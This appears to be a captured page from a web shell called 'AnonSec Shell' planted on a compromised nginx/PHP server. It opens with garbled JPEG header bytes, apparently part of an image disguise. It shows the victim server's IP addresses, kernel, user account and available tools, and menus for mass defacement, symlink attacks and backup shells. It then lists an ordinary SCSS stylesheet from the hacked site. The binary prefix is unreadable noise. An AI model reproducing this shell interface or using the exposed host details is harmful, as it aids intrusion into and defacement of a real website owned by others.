JFIF  H H C nxxd C "     &    !1A2Q"aqBb    1   ? R{~ ,.Y| @sl_޸s[+6ϵG};?2Y`&9LP ?3rj  "@V]:3T -G*P ( *(@AEY]qqqALn +Wtu?)l QU T* Aj- x:˸T u53Vh @PS@ ,i,!"\hPw+E@ ηnu ڶh% (Lvũbb- ?M֍݌٥IHln㏷L(6 9L^"6P  d&1H&8@TUT CJ%eʹFTj4i5=0g J &Wc+3kU@PS@HH33M * "Uc(\`F+b{RxWGk ^#Uj*v' V ,FYKɠMckZٸ]ePP  d\A2glo=WL(6 ^;k"ucoH"b ,PDVlvL_/:̗rN\m dcw T-O$w+FZ5T *Y~l: 99U)8ZAt@GLX*@bijqW;MᎹ،O[5*5*@=qusݝ *EPx՝.~ YИ 3M3@E)GTg%Anp P MUҀhԳW c֦iZ ffR 7qMcyAZT c0bZU k+oG<] APQ T A={PDti@c>>KÚ"q L.1P k6QY7t.k7o  <P &yַܼJZy Wz{UrS @ ~P)Y:A"]Y&ScVO%17 6l4 i4YR5 ruk* ؼdZͨZZ cLakb3N6æ\1`XTloTuT AA 7Uq@2ŬzoʼnБRͪ&8}: e}0ZNΖJ*Ս9˪ޘtao]7$ 9EjS} qt" ( .=Y:V#'H: δ4#6yjѥBB ;WD-ElFf67*\AmAD Q __'2$ TX 9nu'm@iPDT qS`%u%3[nY,  :g = tiX H]ij"+6Z* .~|05s6 ,ǡ ogm+ KtE-BF  ES@(UJ xM~8%g/= Vw[Vh 3lJT  rK -kˎY ٰ  ,ukͱٵf sXDP  ]p]&MS95O+j &f6m463@ t8ЕX=6}HR 5ٶ06 /@嚵*6  " hP@eVDiYQT `7tLf4c?m//B4 laj  L} :E  b#PHQb, yN`rkAb^ |} s4XB4 * ,@[{Ru+%le2} `,kI$U` >OMuh  P % ʵ/ L\5aɕVN1R6 3}ZLj-Dl@ *( K\^i@F@551 k㫖h  Q沬#h XV +;]6z OsFpiX $OQ ) ųl4 YtK'(W AnonSec Shell
AnonSec Shell
Server IP : 104.21.79.64  /  Your IP : 104.23.243.116   [ Reverse IP ]
Web Server : nginx/1.18.0
System : Linux ip-172-31-29-104 5.15.0-1075-aws #82~20.04.1-Ubuntu SMP Thu Dec 19 05:24:09 UTC 2024 x86_64
User : www-data ( 33)
PHP Version : 7.4.3-4ubuntu2.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
Domains : 2 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/app/karina/prd/assets/scss/var/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/app/karina/prd/assets/scss/var/_layout.scss
html {
    scroll-behavior: smooth;
    -webkit-box-sizing: border-box;
    -moz-box-sizing: border-box;
    box-sizing: border-box;
}
div {
    -webkit-box-sizing: border-box;
    -moz-box-sizing: border-box;
    box-sizing: border-box;
}
a:hover {
    text-decoration: none;
}

body {
    font-family: $font_reg;
    background: #fff;
    font-size: 15px;
    overflow-x: hidden;
    background-image: url('../img/bg.jpg');
    background-color: #F4F2EC;
    background-position: top center;
    background-repeat: no-repeat;
    background-size: 100%;
}
.container {
    max-width: 1200px;
}
.container1200 {
    max-width: 1250px;
}
.container1300 {
    max-width: 1300px;
}
.btn {
    display: inline-block;
    color: #000;
    padding: 8px 20px 6px 20px;
    border-radius: 100px;
    font-size: 14px;
    @include transition(0.3s);
    &.btn-full {
        display: block;
    }
    &.btn-big {
        padding: 16px 40px;
        font-size: 18px;
    }
    &.btn-small {
        padding: 4px 8px;
        font-size: 12px;
    }
    &.btn-orange {
        color: #fff;
        background-color: #EF4135;
    }
    &.btn-white {
        color: #fff;
        background-color: rgba($color: #fff, $alpha: 0.3);
    }
    &.btn-white-red {
        color: #BA251B;
        background-color: rgba($color: #fff, $alpha: 0.8);
        border: 1px solid #FDAAA4;
    }
    &.btn-white-red-2 {
        color: #BA251B;
        background-color: rgba($color: #fff, $alpha: 0.8);
        //border: 1px solid #FDAAA4;
    }
    &.btn-black {
        color: #fff;
        background-color: rgba($color: #3E3C3C, $alpha: 1);
        img {
            height: 20px;
            margin-right: 5px;
        }
    }
    &.btn-account {
        background-image: url('../img/arrow-down-gold.png');
        background-repeat: no-repeat;
        background-size: 20px;
        padding-right:30px ;
        padding-left: 10px;
        color: #000;
        background-position: calc(100% - 10px) center;
        .icon-acc {
            height: 20px;
        }
    }
    &.btn-pending {
        background-color: orange;
        color: #fff;
    }
    &.btn-success {
        background-color: green;
        color: #fff;
    }
    &.btn-expired {
        background-color: red;
        color: #fff;
    }

    &:hover {
        opacity: 0.8;
    }
}
.bg-grad {
    position: absolute;
    bottom: 0;
    width: 100%;
    height: 100%;
    left: 0;
    z-index: 1;
    background: linear-gradient(45deg, hsla(0, 0%, 0%, 0) 0%, hsla(0, 0%, 0%, 0.8) 0%, hsla(0, 0%, 0%, 0.2) 70%);
    background: -moz-linear-gradient(45deg, hsla(0, 0%, 0%, 0) 0%, hsla(0, 0%, 0%, 0.8) 0%, hsla(0, 0%, 0%, 0.2) 70%);
    background: -webkit-linear-gradient(45deg, hsla(0, 0%, 0%, 0) 0%, hsla(0, 0%, 0%, 0.8) 0%, hsla(0, 0%, 0%, 0.2) 70%);
}
#slide-hero {
    top: 50%;
    .nav-slide {
        width: 90%;
        z-index: 2;
        left: 0 !important;
        transform: none !important;
        top: 50%;
        .arrow-left {
            left:10%;
        }
        .arrow-right {
            left: calc(95% - 50px);
        }
    }
}
.view-mobile {
    display: none;
}
.section-text {
    background-image: url('../img/bg-section-3.png');
    background-color: #F4F2EC;
    background-position: bottom center;
    background-size: 100%;
    -webkit-border-top-left-radius: 20px;
    -webkit-border-top-right-radius: 20px;
    -moz-border-radius-topleft: 20px;
    -moz-border-radius-topright: 20px;
    border-top-left-radius: 20px;
    border-top-right-radius: 20px;
    overflow: hidden;
    position: relative;
    transform: translateY(-20px);
    z-index: 2;
    padding: 40px 0;
}
.home_donasi {
    position: relative;
    .text {
        position: absolute;
        bottom: 0;
        width: 100%;
        left: 0;
        text-align: left;
        color: #fff;
        z-index: 2;
        .container {
            margin-bottom: 160px;
        }
        h2 {
            font-size:40px ;
            font-weight: 400;
        }
        .desc {
            color: #ADB1B2;
            font-size: 16px;
            margin: 10px 0 30px;
        }
        .sub {
            color: #DDC867;
            font-size: 18px;
            margin-bottom: 10px;
        }
        h1 {
            font-weight: normal;
            b,
            strong {
                color: #DDC867;
                font-weight: normal;
            }
        }
    }
    .img_con {
        background-attachment:fixed;
    }
}

.home-tentang {
    font-size: 18px;
    text-align: center;
    padding: 50px;
}
.content {
    padding-top: 100px;
}
.content2 {
    padding-top: 140px;
}
.title-section {
    font-size: 32px;
    text-align: center;
    margin: 50px 0;
}
.title-page {
    font-size: 32px;
    text-align: center;
    margin: 50px 0;
    .sub {
        color: #CAA231;
        font-size: 16px;
    }
    h1 {
        font-size: 32px;
        margin: 10px 0 30px;
    }
    .desc {
        font-size: 16px;
        color: #ADB1B2;
    }
}
.tab-year {
    text-align: center;
    
    a {
        display: inline-block;
        padding: 8px 16px 6px;
        margin: 0 3px;
        color: #000;
        background-color: #fff;
        border-radius: 100px;
        font-size: 13px;
        @include transition(0.3s);
        &:hover,
        &.active {
            background-color: #CAA231;
            color: #fff;
        }
    }
}
.title-slide {
    position: relative;
    margin: 40px 0 20px;
    .title {
        font-size: 32px;
        color: #142F37;
    }
}
.nav-slide {
    position: absolute;
    width: 100px;
    left: calc(50% - 25px);
    top: 0;
    transform: translate(450px, -50px);
    button {
        display: inline-block;
        position: relative !important;
        width: 40px;
        height: 40px;
        background-size: cover;
        background-repeat: no-repeat;
        &.arrow-left {
            background-image: url('../img/left-button-grey.png');
        }
        &.arrow-right {
            background-image: url('../img/right-button-grey.png');
        }
    }
}
.text-cover-hl {
    position: absolute;
    width: 100%;
    left: 0;
    bottom: 260px;
    text-align: center;
    color: #fff;
    z-index: 2;
    .sub {
        font-size: 20px;
        color:#DDC867 ;
    }
    h1 {
        margin: 20px 0;
        b {
            color:#DDC867;
            font-weight: normal;
        }
    }
}
.breadcrumb {
    background: transparent;
    padding: 0;
    color: #ADB1B2;
    font-size: 14px;
    margin-bottom: 30px;
    img {
        height: 20px;
    }
    a {
        margin: 0 10px;
        color: #6A7B81;
        &:hover {
            text-decoration: underline;
        }
    }
}
.title-page-left {
    margin-bottom: 50px;
    .sub {
        font-size: 20px;
        color:#DDC867 ;
    }
    h1 {
        margin: 20px 0;
        font-weight: normal;
        font-size: 28px;
        b, strong {
            color:#CAA231;
            font-weight: normal;
        }
    }
}
.img-cover-program {
    position: relative;
    margin-top: 80px;
    border-radius: 12px;
    &:before {
        content: "";
        position: absolute;
        z-index: 0;
        height: 20px;
        -webkit-border-top-left-radius: 10px;
        -webkit-border-top-right-radius: 10px;
        -moz-border-radius-topleft: 10px;
        -moz-border-radius-topright: 10px;
        border-top-left-radius: 10px;
        border-top-right-radius: 10px;
        background-color: #CAA231;
        top: -20px;
        display: block;
        width: 80%;
        left: 10%;
    }
    img {
        width: 100%;
    }
    /* .box_img {
        width: 140%;
        border-radius: 12px;
        overflow: hidden;
    } */
}
.box-white-2 {
    background-image: url('../img/bg2102.jpeg');
    background-position: top center;
    background-repeat: no-repeat;
    background-size: 100%;
    background-color: rgba($color: #fff, $alpha: 0.9);
    text-align: center;
    padding: 60px 30px;
    -webkit-border-top-left-radius: 20px;
    -webkit-border-top-right-radius: 20px;
    -moz-border-radius-topleft: 20px;
    -moz-border-radius-topright: 20px;
    border-top-left-radius: 20px;
    border-top-right-radius: 20px;
    &.box-white-2a {
        margin: 0 20px;
    }
    h3 {
        margin-bottom: 30px;
    }
    .desc {
        padding: 0 150px;
    }
    .img {
        padding-bottom: 60px;
        div {
            margin: 20px;
            img {
                width: 100%;
                border-radius: 12px;
                border: 5px solid #fff;
                background-color: #fff;
            }
            &:nth-child(2) {
                img {
                    transform: translateY(50px);
                }
            }
        }
    }
}
.list-program {
    margin-top: 40px;
    .container1200 {
        margin-top: -40px;
        &:nth-child(1) {
            width: 1200px;
        }
    }
}

.about-fitur {
    margin-top: 100px;
}
.notif-akun {
    background-color: rgba($color: #fff, $alpha: 0.5);
    color: #000;
    padding: 10px;
    border-radius: 8px;
    margin: 10px 0;
    img {
        height: 20px;
    }
    a {
        color: #EF4135;
        text-decoration: underline;
    }
}

.notif-bar-fail {
    background-color: rgba($color: #BA251B, $alpha: 0.5);
    color: #fff;
    padding: 10px;
    border-radius: 8px;
    margin: 10px 0;
    img {
        height: 20px;
    }
    a {
        color: #EF4135;
        text-decoration: underline;
    }
}
.link-red {
    color: #EF4135;
    text-decoration: underline;
}
.sub-struktur {
    color: #000;
    font-weight: normal;
    font-size: 20px;
    padding-left: 20px;
    border-left: 3px solid #CAA231;
    margin-top: 50px;
    margin-bottom: 10px;
}
.sub-struktur-2 {
    font-size: 16px;
    padding-left: 20px;
    margin-top: 20px;
}
.btn-donasi-status {
}
.box-account-rek {
    background-color: #FAFAFA;
    border-radius: 8px;
    border: 1px solid #DEDEDE;
    padding: 30px;
    position: relative;
    z-index: 2;
    h2 {
        font-size: 24px;
        color: #EF4135;
    }
    .box-inside {
        background-color: #fff;
        border-radius: 8px;
        padding: 20px;
        h3 {
            color: #142F37;
            font-size: 20px;
        }
        .box-rekening {
            background-color: #F4F2EC;
            font-size: 20px;
            color: #865B22;
            padding: 10px 16px 10px 24px;
            border-radius: 100px;
            display: inline-block;
            .btn {
                margin-left: 20px;
                img {
                    height: 20px;
                }
            }

        }
    }
}
.box-ak {
    position: relative;
    width: 550px;
    margin: 0 auto;
    &::before {
        content: "";
        background-color: #EF4135;
        width: 570px;
        height: 80%;
        top: 10%;
        border-radius: 20px;
        position: absolute;
        z-index: -1;
    }
}
.inline {
    display: inline-block !important;
}
.font24 {
    font-size: 24px !important;
}

Anon7 - 2022
AnonSec Team